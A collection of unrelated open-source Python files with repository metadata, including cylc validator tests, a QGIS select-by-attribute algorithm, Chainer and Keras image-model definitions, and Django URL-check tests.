assert parsec_validator is not None
def test_parsec_validator(sample_spec):
parsec_validator = ParsecValidator()
cfg = OrderedDictWithDefaults()
cfg['section1'] = OrderedDictWithDefaults()
cfg['section1']['value1'] = '1'
cfg['section1']['value2'] = '2'
cfg['section3'] = OrderedDictWithDefaults()
cfg['section3']['title'] = None
parsec_validator.validate(cfg, sample_spec)
# TBD assertIsNotNone when 2.6+
assert parsec_validator is not None
# --- static methods
def test_coerce_none_fails():
with pytest.raises(AttributeError):
ParsecValidator.coerce_boolean(None, [])
with pytest.raises(AttributeError):
ParsecValidator.coerce_float(None, [])
with pytest.raises(AttributeError):
ParsecValidator.coerce_int(None, [])
def test_coerce_boolean():
"""Test coerce_boolean."""
validator = ParsecValidator()
# The good
for value, result in [
('True', True),
(' True ', True),
('"True"', True),
("'True'", True),
('true', True),
(' true ', True),
('"true"', True),
("'true'", True),
('False', False),
(' False ', False),
('"False"', False),
("'False'", False),
('false', False),
(' false ', False),
('"false"', False),
("'false'", False),
('', None),
(' ', None)
]:
assert validator.coerce_boolean(value, ['whatever']) == result
# The bad
for value in [
'None', ' Who cares? ', '3.14', '[]', '[True]', 'True, False'
]:
with pytest.raises(IllegalValueError):
validator.coerce_boolean(value, ['whatever'])
@pytest.mark.parametrize(
'value, expected',
[
('3', 3.0),
('9.80', 9.80),
('3.141592654', 3.141592654),
('"3.141592654"', 3.141592654),
("'3.141592654'", 3.141592654),
('-3', -3.0),
('-3.1', -3.1),
('0', 0.0),
('-0', -0.0),
('0.0', 0.0),
('1e20', 1.0e20),
('6.02e23', 6.02e23),
('-1.6021765e-19', -1.6021765e-19),
('6.62607004e-34', 6.62607004e-34),
]
)
def test_coerce_float(value: str, expected: float):
"""Test coerce_float."""
assert (
ParsecValidator.coerce_float(value, ['whatever']) == approx(expected)
)
def test_coerce_float__empty():
# not a number
assert ParsecValidator.coerce_float('', ['whatever']) is None
@pytest.mark.parametrize(
'value',
['None', ' Who cares? ', 'True', '[]', '[3.14]', '3.14, 2.72']
)
def test_coerce_float__bad(value: str):
with pytest.raises(IllegalValueError):
ParsecValidator.coerce_float(value, ['whatever'])
@pytest.mark.parametrize(
'value, expected',
[
('', []),
('3', [3.0]),
('2*3.141592654', [3.141592654, 3.141592654]),
('12*8, 8*12.0', [8.0] * 12 + [12.0] * 8),
('-3, -2, -1, -0.0, 1.0', [-3.0, -2.0, -1.0, -0.0, 1.0]),
('6.02e23, -1.6021765e-19, 6.62607004e-34',
[6.02e23, -1.6021765e-19, 6.62607004e-34]),
]
)
def test_coerce_float_list(value: str, expected: List[float]):
"""Test coerce_float_list."""
items = ParsecValidator.coerce_float_list(value, ['whatever'])
assert items == approx(expected)
@pytest.mark.parametrize(
'value',
['None', 'e, i, e, i, o', '[]', '[3.14]', 'pi, 2.72', '2*True']
)
def test_coerce_float_list__bad(value: str):
with pytest.raises(IllegalValueError):
ParsecValidator.coerce_float_list(value, ['whatever'])
@pytest.mark.parametrize(
'value, expected',
[
('0', 0),
('3', 3),
('-3', -3),
('-0', -0),
('653456', 653456),
('-8362583645365', -8362583645365)
]
)
def test_coerce_int(value: str, expected: int):
"""Test coerce_int."""
assert ParsecValidator.coerce_int(value, ['whatever']) == expected
def test_coerce_int__empty():
assert ParsecValidator.coerce_int('', ['whatever']) is None # not a number
@pytest.mark.parametrize(
'value',
['None', ' Who cares? ', 'True', '4.8', '[]', '[3]', '60*60']
)
def test_coerce_int__bad(value: str):
with pytest.raises(IllegalValueError):
ParsecValidator.coerce_int(value, ['whatever'])
def test_coerce_int_list():
"""Test coerce_int_list."""
validator = ParsecValidator()
# The good
for value, results in [
('', []),
('3', [3]),
('1..10, 11..20..2',
[1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 13, 15, 17, 19]),
('18 .. 24', [18, 19, 20, 21, 22, 23, 24]),
('18 .. 24 .. 3', [18, 21, 24]),
('-10..10..3', [-10, -7, -4, -1, 2, 5, 8]),
('10*3, 4*-6', [3] * 10 + [-6] * 4),
('10*128, -78..-72, 2048',
[128] * 10 + [-78, -77, -76, -75, -74, -73, -72, 2048])
]:
assert validator.coerce_int_list(value, ['whatever']) == results
# The bad
for value in [
'None', 'e, i, e, i, o', '[]', '1..3, x', 'one..ten'
]:
with pytest.raises(IllegalValueError):
validator.coerce_int_list(value, ['whatever'])
def test_coerce_str():
"""Test coerce_str."""
validator = ParsecValidator()
# The good
for value, result in [
('', ''),
('Hello World!', 'Hello World!'),
('"Hello World!"', 'Hello World!'),
('"Hello Cylc\'s World!"', 'Hello Cylc\'s World!'),
("'Hello World!'", 'Hello World!'),
('0', '0'),
('My list is:\nfoo, bar, baz\n', 'My list is:\nfoo, bar, baz'),
(' Hello:\n foo\n bar\n baz\n',
'Hello:\nfoo\nbar\nbaz'),
(' Hello:\n foo\n Greet\n baz\n',
'Hello:\n foo\nGreet\n baz'),
('False', 'False'),
('None', 'None'),
(['a', 'b'], 'a\nb')
]:
assert validator.coerce_str(value, ['whatever']) == result
def test_coerce_str_list():
"""Test coerce_str_list."""
validator = ParsecValidator()
# The good
for value, results in [
('', []),
('Hello', ['Hello']),
('"Hello"', ['Hello']),
('1', ['1']),
('Mercury, Venus, Earth, Mars',
['Mercury', 'Venus', 'Earth', 'Mars']),
('Mercury, Venus, Earth, Mars,\n"Jupiter",\n"Saturn"\n',
['Mercury', 'Venus', 'Earth', 'Mars', 'Jupiter', 'Saturn']),
('New Zealand, United Kingdom',
['New Zealand', 'United Kingdom'])
]:
assert validator.coerce_str_list(value, ['whatever']) == results
def test_strip_and_unquote():
with pytest.raises(IllegalValueError):
ParsecValidator.strip_and_unquote(['a'], '"""')
def test_strip_and_unquote_list_parsec():
"""Test strip_and_unquote_list using ParsecValidator."""
for value, results in [
('"a"\n"b"', ['a', 'b']),
('"a", "b"', ['a', 'b']),
('"a", "b"', ['a', 'b']),
('"c" # d', ['c']),
('"a", "b", "c" # d', ['a', 'b', 'c']),
('"a"\n"b"\n"c" # d', ['a', 'b', 'c']),
("'a', 'b'", ['a', 'b']),
("'c' #d", ['c']),
("'a', 'b', 'c' # d", ['a', 'b', 'c']),
("'a'\n'b'\n'c' # d", ['a', 'b', 'c']),
('a, b, c,', ['a', 'b', 'c']),
('a, b, c # d', ['a', 'b', 'c']),
('a, b, c\n"d"', ['a', 'b', 'd']),
('a, b, c\n"d" # e', ['a', 'b', '"d"'])
]:
assert results == ParsecValidator.strip_and_unquote_list(
['a'], value)
def test_strip_and_unquote_list_cylc(strip_and_unquote_list):
"""Test strip_and_unquote_list using CylcConfigValidator."""
validator = VDR()
for values in strip_and_unquote_list:
value = values[0]
expected = values[1]
output = validator.strip_and_unquote_list(keys=[], value=value)
assert expected == output
def test_strip_and_unquote_list_multiparam():
with pytest.raises(ListValueError):
ParsecValidator.strip_and_unquote_list(
['a'], 'a, b, c<a,b>'
)
def test_coerce_cycle_point():
"""Test coerce_cycle_point."""
validator = VDR()
# The good
for value, result in [
('', None),
('3', '3'),
('2018', '2018'),
('20181225T12Z', '20181225T12Z'),
('2018-12-25T12:00+11:00', '2018-12-25T12:00+11:00')]:
assert validator.coerce_cycle_point(value, ['whatever']) == result
# The bad
for value in [
'None', ' Who cares? ', 'True', '1, 2', '20781340E10']:
with pytest.raises(IllegalValueError):
validator.coerce_cycle_point(value, ['whatever'])
def test_coerce_cycle_point_format():
"""Test coerce_cycle_point_format."""
validator = VDR()
# The good
for value, result in [
('', None),
('%Y%m%dT%H%M%z', '%Y%m%dT%H%M%z'),
('CCYYMMDDThhmmZ', 'CCYYMMDDThhmmZ'),
('XCCYYMMDDThhmmZ', 'XCCYYMMDDThhmmZ')]:
assert (
validator.coerce_cycle_point_format(value, ['whatever'])
== result
)
# The bad
# '/' and ':' not allowed in cylc cycle points (they are used in paths).
for value in ['%i%j', 'Y/M/D', '%Y-%m-%dT%H:%MZ']:
with pytest.raises(IllegalValueError):
validator.coerce_cycle_point_format(value, ['whatever'])
def test_coerce_cycle_point_time_zone():
"""Test coerce_cycle_point_time_zone."""
validator = VDR()
# The good
for value, result in [
('', None),
('Z', 'Z'),
('+0000', '+0000'),
('+0100', '+0100'),
('+1300', '+1300'),
('-0630', '-0630')]:
assert (
validator.coerce_cycle_point_time_zone(value, ['whatever'])
== result
)
# The bad
for value in ['None', 'Big Bang Time', 'Standard Galaxy Time']:
with pytest.raises(IllegalValueError):
validator.coerce_cycle_point_time_zone(value, ['whatever'])
def test_coerce_interval():
"""Test coerce_interval."""
validator = VDR()
# The good
for value, result in [
('', None),
('P3D', DurationFloat(259200)),
('PT10M10S', DurationFloat(610))]:
assert validator.coerce_interval(value, ['whatever']) == result
# The bad
for value in ['None', '5 days', '20', '-12']:
with pytest.raises(IllegalValueError):
validator.coerce_interval(value, ['whatever'])
@pytest.mark.parametrize(
'value, expected',
[
('', []),
('P3D', [DurationFloat(259200)]),
('P3D, PT10M10S', [DurationFloat(259200), DurationFloat(610)]),
('25*PT30M,10*PT1H',
[DurationFloat(1800)] * 25 + [DurationFloat(3600)] * 10)
]
)
def test_coerce_interval_list(value: str, expected: List[DurationFloat]):
"""Test coerce_interval_list."""
assert VDR.coerce_interval_list(value, ['whatever']) == approx(expected)
@pytest.mark.parametrize(
'value',
['None', '5 days', '20', 'PT10S, -12']
)
def test_coerce_interval_list__bad(value: str):
with pytest.raises(IllegalValueError):
VDR.coerce_interval_list(value, ['whatever'])
def test_coerce_parameter_list():
"""Test coerce_parameter_list."""
validator = VDR()
# The good
for value, result in [
('', []),
('planet', ['planet']),
('planet, star, galaxy', ['planet', 'star', 'galaxy']),
('1..5, 21..25', [1, 2, 3, 4, 5, 21, 22, 23, 24, 25]),
('-15, -10, -5, -1..1', [-15, -10, -5, -1, 0, 1])]:
assert validator.coerce_parameter_list(value, ['whatever']) == result
# The bad
for value in ['foo/bar', 'p1, 1..10', '2..3, 4, p']:
with pytest.raises(IllegalValueError):
validator.coerce_parameter_list(value, ['whatever'])
def test_coerce_xtrigger():
"""Test coerce_xtrigger."""
validator = VDR()
# The good
for value, result in [
('foo(x="bar")', 'foo(x=bar)'),
('foo(x, y, z="zebra")', 'foo(x, y, z=zebra)')]:
assert (
validator.coerce_xtrigger(value, ['whatever']).get_signature()
== result
)
# The bad
for value in [
'', 'foo(', 'foo)', 'foo,bar']:
with pytest.raises(IllegalValueError):
validator.coerce_xtrigger(value, ['whatever'])
def test_type_help_examples():
types = {
**ParsecValidator.V_TYPE_HELP,
**VDR.V_TYPE_HELP
}
validator = VDR()
for vdr, info in types.items():
coercer = validator.coercers[vdr]
if len(info) > 2:
for example in info[2]:
try:
coercer(example, [None])
except Exception:
raise Exception(
f'Example "{example}" failed for type "{vdr}"')
|
oliver-sanders/cylc
|
tests/unit/parsec/test_validate.py
|
Python
|
gpl-3.0
| 21,599
| 0
|
import click
from arrow.cli import pass_context, json_loads
from arrow.decorators import custom_exception, dict_output
@click.command('get_comments')
@click.argument("feature_id", type=str)
@click.option(
"--organism",
help="Organism Common Name",
type=str
)
@click.option(
"--sequence",
help="Sequence Name",
type=str
)
@pass_context
@custom_exception
@dict_output
def cli(ctx, feature_id, organism="", sequence=""):
"""Get a feature's comments
Output:
A standard apollo feature dictionary ({"features": [{...}]})
"""
return ctx.gi.annotations.get_comments(feature_id, organism=organism, sequence=sequence)
|
erasche/python-apollo
|
arrow/commands/annotations/get_comments.py
|
Python
|
mit
| 652
| 0.001534
|
# -*- coding: utf-8 -*-
"""
***************************************************************************
SelectByAttribute.py
---------------------
Date : May 2010
Copyright : (C) 2010 by Michael Minn
Email : pyqgis at michaelminn dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Michael Minn'
__date__ = 'May 2010'
__copyright__ = '(C) 2010, Michael Minn'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
from qgis.PyQt.QtCore import QVariant
from qgis.core import (QgsExpression,
QgsProcessingException,
QgsProcessingParameterVectorLayer,
QgsProcessingParameterField,
QgsProcessingParameterEnum,
QgsProcessingParameterString,
QgsProcessingOutputVectorLayer)
from processing.algs.qgis.QgisAlgorithm import QgisAlgorithm
class SelectByAttribute(QgisAlgorithm):
INPUT = 'INPUT'
FIELD = 'FIELD'
OPERATOR = 'OPERATOR'
VALUE = 'VALUE'
OUTPUT = 'OUTPUT'
OPERATORS = ['=',
'!=',
'>',
'>=',
'<',
'<=',
'begins with',
'contains',
'is null',
'is not null',
'does not contain'
]
STRING_OPERATORS = ['begins with',
'contains',
'does not contain']
def tags(self):
return self.tr('select,attribute,value,contains,null,field').split(',')
def group(self):
return self.tr('Vector selection')
def __init__(self):
super().__init__()
def initAlgorithm(self, config=None):
self.i18n_operators = ['=',
'!=',
'>',
'>=',
'<',
'<=',
self.tr('begins with'),
self.tr('contains'),
self.tr('is null'),
self.tr('is not null'),
self.tr('does not contain')
]
self.addParameter(QgsProcessingParameterVectorLayer(self.INPUT, self.tr('Input layer')))
self.addParameter(QgsProcessingParameterField(self.FIELD,
self.tr('Selection attribute'), parentLayerParameterName=self.INPUT))
self.addParameter(QgsProcessingParameterEnum(self.OPERATOR,
self.tr('Operator'), self.i18n_operators))
self.addParameter(QgsProcessingParameterString(self.VALUE, self.tr('Value')))
self.addOutput(QgsProcessingOutputVectorLayer(self.OUTPUT, self.tr('Selected (attribute)')))
def name(self):
return 'selectbyattribute'
def displayName(self):
return self.tr('Select by attribute')
def processAlgorithm(self, parameters, context, feedback):
layer = self.parameterAsVectorLayer(parameters, self.INPUT, context)
fieldName = self.parameterAsString(parameters, self.FIELD, context)
operator = self.OPERATORS[self.parameterAsEnum(parameters, self.OPERATOR, context)]
value = self.parameterAsString(parameters, self.VALUE, context)
fields = layer.fields()
idx = layer.fields().lookupField(fieldName)
fieldType = fields[idx].type()
if fieldType != QVariant.String and operator in self.STRING_OPERATORS:
op = ''.join(['"%s", ' % o for o in self.STRING_OPERATORS])
raise QgsProcessingException(
self.tr('Operators {0} can be used only with string fields.').format(op))
field_ref = QgsExpression.quotedColumnRef(fieldName)
quoted_val = QgsExpression.quotedValue(value)
if operator == 'is null':
expression_string = '{} IS NULL'.format(field_ref)
elif operator == 'is not null':
expression_string = '{} IS NOT NULL'.format(field_ref)
elif operator == 'begins with':
expression_string = """%s LIKE '%s%%'""" % (field_ref, value)
elif operator == 'contains':
expression_string = """%s LIKE '%%%s%%'""" % (field_ref, value)
elif operator == 'does not contain':
expression_string = """%s NOT LIKE '%%%s%%'""" % (field_ref, value)
else:
expression_string = '{} {} {}'.format(field_ref, operator, quoted_val)
expression = QgsExpression(expression_string)
if expression.hasParserError():
raise QgsProcessingException(expression.parserErrorString())
layer.selectByExpression(expression_string)
return {self.OUTPUT: parameters[self.INPUT]}
|
nirvn/QGIS
|
python/plugins/processing/algs/qgis/SelectByAttribute.py
|
Python
|
gpl-2.0
| 5,528
| 0.001447
|
import chainer
import chainer.functions as F
import chainer.links as L
class vgga(chainer.Chain):
insize = 224
def __init__(self):
super(vgga, self).__init__()
with self.init_scope():
self.conv1 = L.Convolution2D( 3, 64, 3, stride=1, pad=1)
self.conv2 = L.Convolution2D( 64, 128, 3, stride=1, pad=1)
self.conv3 = L.Convolution2D(128, 256, 3, stride=1, pad=1)
self.conv4 = L.Convolution2D(256, 256, 3, stride=1, pad=1)
self.conv5 = L.Convolution2D(256, 512, 3, stride=1, pad=1)
self.conv6 = L.Convolution2D(512, 512, 3, stride=1, pad=1)
self.conv7 = L.Convolution2D(512, 512, 3, stride=1, pad=1)
self.conv8 = L.Convolution2D(512, 512, 3, stride=1, pad=1)
self.fc6 = L.Linear(512 * 7 * 7, 4096)
self.fc7 = L.Linear(4096, 4096)
self.fc8 = L.Linear(4096, 1000)
def forward(self, x):
h = F.max_pooling_2d(F.relu(self.conv1(x)), 2, stride=2)
h = F.max_pooling_2d(F.relu(self.conv2(h)), 2, stride=2)
h = F.relu(self.conv3(h))
h = F.max_pooling_2d(F.relu(self.conv4(h)), 2, stride=2)
h = F.relu(self.conv5(h))
h = F.max_pooling_2d(F.relu(self.conv6(h)), 2, stride=2)
h = F.relu(self.conv7(h))
h = F.max_pooling_2d(F.relu(self.conv8(h)), 2, stride=2)
h = F.relu(self.fc6(h))
h = F.relu(self.fc7(h))
return self.fc8(h)
|
soumith/convnet-benchmarks
|
chainer/vgga.py
|
Python
|
mit
| 1,463
| 0.001367
|
from django.core.checks.urls import check_url_config
from django.test import SimpleTestCase
from django.test.utils import override_settings
class CheckUrlsTest(SimpleTestCase):
@override_settings(ROOT_URLCONF='check_framework.urls_no_warnings')
def test_include_no_warnings(self):
result = check_url_config(None)
self.assertEqual(result, [])
@override_settings(ROOT_URLCONF='check_framework.urls_include')
def test_include_with_dollar(self):
result = check_url_config(None)
self.assertEqual(len(result), 1)
warning = result[0]
self.assertEqual(warning.id, 'urls.W001')
expected_msg = "Your URL pattern '^include-with-dollar$' uses include with a regex ending with a '$'."
self.assertIn(expected_msg, warning.msg)
@override_settings(ROOT_URLCONF='check_framework.urls_slash')
def test_url_beginning_with_slash(self):
result = check_url_config(None)
self.assertEqual(len(result), 1)
warning = result[0]
self.assertEqual(warning.id, 'urls.W002')
expected_msg = "Your URL pattern '/starting-with-slash/$' has a regex beginning with a '/'"
self.assertIn(expected_msg, warning.msg)
@override_settings(ROOT_URLCONF='check_framework.urls_name')
def test_url_pattern_name_with_colon(self):
result = check_url_config(None)
self.assertEqual(len(result), 1)
warning = result[0]
self.assertEqual(warning.id, 'urls.W003')
expected_msg = "Your URL pattern '^$' [name='name_with:colon'] has a name including a ':'."
self.assertIn(expected_msg, warning.msg)
|
cainmatt/django
|
tests/check_framework/test_urls.py
|
Python
|
bsd-3-clause
| 1,638
| 0.001832
|
"""Find all models written by user Hutton, including the DOI and the
source code repository for each model.
"""
from ask_api_examples import make_query
query = '[[Last name::Hutton]]|?DOI model|?Source web address'
def main():
r = make_query(query, __file__)
return r
if __name__ == '__main__':
print main()
|
mdpiper/csdms-wiki-api-examples
|
ask_api_examples/list_model_repo_doi.py
|
Python
|
mit
| 327
| 0
|
# -*- coding: utf-8 -*-
"""Xception V1 model for Keras.
On ImageNet, this model gets to a top-1 validation accuracy of 0.790
and a top-5 validation accuracy of 0.945.
Do note that the input image format for this model is different than for
the VGG16 and ResNet models (299x299 instead of 224x224),
and that the input preprocessing function
is also different (same as Inception V3).
Also do note that this model is only available for the TensorFlow backend,
due to its reliance on `SeparableConvolution` layers.
# Reference
- [Xception: Deep Learning with Depthwise Separable Convolutions](https://arxiv.org/abs/1610.02357)
"""
from __future__ import print_function
from __future__ import absolute_import
import warnings
from ..models import Model
from .. import layers
from ..layers import Dense
from ..layers import Input
from ..layers import BatchNormalization
from ..layers import Activation
from ..layers import Conv2D
from ..layers import SeparableConv2D
from ..layers import MaxPooling2D
from ..layers import GlobalAveragePooling2D
from ..layers import GlobalMaxPooling2D
from ..engine.topology import get_source_inputs
from ..utils.data_utils import get_file
from .. import backend as K
from .imagenet_utils import decode_predictions
from .imagenet_utils import _obtain_input_shape
TF_WEIGHTS_PATH = 'https://github.com/fchollet/deep-learning-models/releases/download/v0.4/xception_weights_tf_dim_ordering_tf_kernels.h5'
TF_WEIGHTS_PATH_NO_TOP = 'https://github.com/fchollet/deep-learning-models/releases/download/v0.4/xception_weights_tf_dim_ordering_tf_kernels_notop.h5'
def Xception(include_top=True, weights='imagenet',
input_tensor=None, input_shape=None,
pooling=None,
classes=1000):
"""Instantiates the Xception architecture.
Optionally loads weights pre-trained
on ImageNet. This model is available for TensorFlow only,
and can only be used with inputs following the TensorFlow
data format `(width, height, channels)`.
You should set `image_data_format="channels_last"` in your Keras config
located at ~/.keras/keras.json.
Note that the default input image size for this model is 299x299.
# Arguments
include_top: whether to include the fully-connected
layer at the top of the network.
weights: one of `None` (random initialization)
or "imagenet" (pre-training on ImageNet).
input_tensor: optional Keras tensor (i.e. output of `layers.Input()`)
to use as image input for the model.
input_shape: optional shape tuple, only to be specified
if `include_top` is False (otherwise the input shape
has to be `(299, 299, 3)`.
It should have exactly 3 inputs channels,
and width and height should be no smaller than 71.
E.g. `(150, 150, 3)` would be one valid value.
pooling: Optional pooling mode for feature extraction
when `include_top` is `False`.
- `None` means that the output of the model will be
the 4D tensor output of the
last convolutional layer.
- `avg` means that global average pooling
will be applied to the output of the
last convolutional layer, and thus
the output of the model will be a 2D tensor.
- `max` means that global max pooling will
be applied.
classes: optional number of classes to classify images
into, only to be specified if `include_top` is True, and
if no `weights` argument is specified.
# Returns
A Keras model instance.
# Raises
ValueError: in case of invalid argument for `weights`,
or invalid input shape.
RuntimeError: If attempting to run this model with a
backend that does not support separable convolutions.
"""
if weights not in {'imagenet', None}:
raise ValueError('The `weights` argument should be either '
'`None` (random initialization) or `imagenet` '
'(pre-training on ImageNet).')
if weights == 'imagenet' and include_top and classes != 1000:
raise ValueError('If using `weights` as imagenet with `include_top`'
' as true, `classes` should be 1000')
if K.backend() != 'tensorflow':
raise RuntimeError('The Xception model is only available with '
'the TensorFlow backend.')
if K.image_data_format() != 'channels_last':
warnings.warn('The Xception model is only available for the '
'input data format "channels_last" '
'(width, height, channels). '
'However your settings specify the default '
'data format "channels_first" (channels, width, height). '
'You should set `image_data_format="channels_last"` in your Keras '
'config located at ~/.keras/keras.json. '
'The model being returned right now will expect inputs '
'to follow the "channels_last" data format.')
K.set_image_data_format('channels_last')
old_data_format = 'channels_first'
else:
old_data_format = None
# Determine proper input shape
input_shape = _obtain_input_shape(input_shape,
default_size=299,
min_size=71,
data_format=K.image_data_format(),
include_top=include_top)
if input_tensor is None:
img_input = Input(shape=input_shape)
else:
if not K.is_keras_tensor(input_tensor):
img_input = Input(tensor=input_tensor, shape=input_shape)
else:
img_input = input_tensor
x = Conv2D(32, (3, 3), strides=(2, 2), use_bias=False, name='block1_conv1')(img_input)
x = BatchNormalization(name='block1_conv1_bn')(x)
x = Activation('relu', name='block1_conv1_act')(x)
x = Conv2D(64, (3, 3), use_bias=False, name='block1_conv2')(x)
x = BatchNormalization(name='block1_conv2_bn')(x)
x = Activation('relu', name='block1_conv2_act')(x)
residual = Conv2D(128, (1, 1), strides=(2, 2),
padding='same', use_bias=False)(x)
residual = BatchNormalization()(residual)
x = SeparableConv2D(128, (3, 3), padding='same', use_bias=False, name='block2_sepconv1')(x)
x = BatchNormalization(name='block2_sepconv1_bn')(x)
x = Activation('relu', name='block2_sepconv2_act')(x)
x = SeparableConv2D(128, (3, 3), padding='same', use_bias=False, name='block2_sepconv2')(x)
x = BatchNormalization(name='block2_sepconv2_bn')(x)
x = MaxPooling2D((3, 3), strides=(2, 2), padding='same', name='block2_pool')(x)
x = layers.add([x, residual])
residual = Conv2D(256, (1, 1), strides=(2, 2),
padding='same', use_bias=False)(x)
residual = BatchNormalization()(residual)
x = Activation('relu', name='block3_sepconv1_act')(x)
x = SeparableConv2D(256, (3, 3), padding='same', use_bias=False, name='block3_sepconv1')(x)
x = BatchNormalization(name='block3_sepconv1_bn')(x)
x = Activation('relu', name='block3_sepconv2_act')(x)
x = SeparableConv2D(256, (3, 3), padding='same', use_bias=False, name='block3_sepconv2')(x)
x = BatchNormalization(name='block3_sepconv2_bn')(x)
x = MaxPooling2D((3, 3), strides=(2, 2), padding='same', name='block3_pool')(x)
x = layers.add([x, residual])
residual = Conv2D(728, (1, 1), strides=(2, 2),
padding='same', use_bias=False)(x)
residual = BatchNormalization()(residual)
x = Activation('relu', name='block4_sepconv1_act')(x)
x = SeparableConv2D(728, (3, 3), padding='same', use_bias=False, name='block4_sepconv1')(x)
x = BatchNormalization(name='block4_sepconv1_bn')(x)
x = Activation('relu', name='block4_sepconv2_act')(x)
x = SeparableConv2D(728, (3, 3), padding='same', use_bias=False, name='block4_sepconv2')(x)
x = BatchNormalization(name='block4_sepconv2_bn')(x)
x = MaxPooling2D((3, 3), strides=(2, 2), padding='same', name='block4_pool')(x)
x = layers.add([x, residual])
for i in range(8):
residual = x
prefix = 'block' + str(i + 5)
x = Activation('relu', name=prefix + '_sepconv1_act')(x)
x = SeparableConv2D(728, (3, 3), padding='same', use_bias=False, name=prefix + '_sepconv1')(x)
x = BatchNormalization(name=prefix + '_sepconv1_bn')(x)
x = Activation('relu', name=prefix + '_sepconv2_act')(x)
x = SeparableConv2D(728, (3, 3), padding='same', use_bias=False, name=prefix + '_sepconv2')(x)
x = BatchNormalization(name=prefix + '_sepconv2_bn')(x)
x = Activation('relu', name=prefix + '_sepconv3_act')(x)
x = SeparableConv2D(728, (3, 3), padding='same', use_bias=False, name=prefix + '_sepconv3')(x)
x = BatchNormalization(name=prefix + '_sepconv3_bn')(x)
x = layers.add([x, residual])
residual = Conv2D(1024, (1, 1), strides=(2, 2),
padding='same', use_bias=False)(x)
residual = BatchNormalization()(residual)
x = Activation('relu', name='block13_sepconv1_act')(x)
x = SeparableConv2D(728, (3, 3), padding='same', use_bias=False, name='block13_sepconv1')(x)
x = BatchNormalization(name='block13_sepconv1_bn')(x)
x = Activation('relu', name='block13_sepconv2_act')(x)
x = SeparableConv2D(1024, (3, 3), padding='same', use_bias=False, name='block13_sepconv2')(x)
x = BatchNormalization(name='block13_sepconv2_bn')(x)
x = MaxPooling2D((3, 3), strides=(2, 2), padding='same', name='block13_pool')(x)
x = layers.add([x, residual])
x = SeparableConv2D(1536, (3, 3), padding='same', use_bias=False, name='block14_sepconv1')(x)
x = BatchNormalization(name='block14_sepconv1_bn')(x)
x = Activation('relu', name='block14_sepconv1_act')(x)
x = SeparableConv2D(2048, (3, 3), padding='same', use_bias=False, name='block14_sepconv2')(x)
x = BatchNormalization(name='block14_sepconv2_bn')(x)
x = Activation('relu', name='block14_sepconv2_act')(x)
if include_top:
x = GlobalAveragePooling2D(name='avg_pool')(x)
x = Dense(classes, activation='softmax', name='predictions')(x)
else:
if pooling == 'avg':
x = GlobalAveragePooling2D()(x)
elif pooling == 'max':
x = GlobalMaxPooling2D()(x)
# Ensure that the model takes into account
# any potential predecessors of `input_tensor`.
if input_tensor is not None:
inputs = get_source_inputs(input_tensor)
else:
inputs = img_input
# Create model.
model = Model(inputs, x, name='xception')
# load weights
if weights == 'imagenet':
if include_top:
weights_path = get_file('xception_weights_tf_dim_ordering_tf_kernels.h5',
TF_WEIGHTS_PATH,
cache_subdir='models')
else:
weights_path = get_file('xception_weights_tf_dim_ordering_tf_kernels_notop.h5',
TF_WEIGHTS_PATH_NO_TOP,
cache_subdir='models')
model.load_weights(weights_path)
if old_data_format:
K.set_image_data_format(old_data_format)
return model
def preprocess_input(x):
x /= 255.
x -= 0.5
x *= 2.
return x
|
bbenligiray/keras_models
|
not_used/xception.py
|
Python
|
mit
| 11,593
| 0.002156
|
def f():
try:
a = 1
except:
b = 1
|
idea4bsd/idea4bsd
|
python/testData/copyPaste/Whitespace.after.py
|
Python
|
apache-2.0
| 59
| 0.016949
|
# Copyright (C) 2010-2011 Richard Lincoln
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from CIM14.Element import Element
class LineDetail(Element):
"""Details on an amount line, with rounding, date and note.
"""
def __init__(self, dateTime='', rounding=0.0, note='', amount=0.0, *args, **kw_args):
"""Initialises a new 'LineDetail' instance.
@param dateTime: Date and time when this line was created in the application process.
@param rounding: Totalised monetary value of all errors due to process rounding or truncating that is not reflected in 'amount'.
@param note: Free format note relevant to this line.
@param amount: Amount for this line item.
"""
#: Date and time when this line was created in the application process.
self.dateTime = dateTime
#: Totalised monetary value of all errors due to process rounding or truncating that is not reflected in 'amount'.
self.rounding = rounding
#: Free format note relevant to this line.
self.note = note
#: Amount for this line item.
self.amount = amount
super(LineDetail, self).__init__(*args, **kw_args)
_attrs = ["dateTime", "rounding", "note", "amount"]
_attr_types = {"dateTime": str, "rounding": float, "note": str, "amount": float}
_defaults = {"dateTime": '', "rounding": 0.0, "note": '', "amount": 0.0}
_enums = {}
_refs = []
_many_refs = []
|
rwl/PyCIM
|
CIM14/IEC61968/PaymentMetering/LineDetail.py
|
Python
|
mit
| 2,482
| 0.004432
|
#!/usr/bin/env python
# This file is part of VoltDB.
# Copyright (C) 2008-2010 VoltDB Inc.
#
# VoltDB is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# VoltDB is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with VoltDB. If not, see <http://www.gnu.org/licenses/>.
testspec = """
class Database {
/** test comment */
// more comments
Partition* partitions; // more comments
Table* tables;
Program* programs;
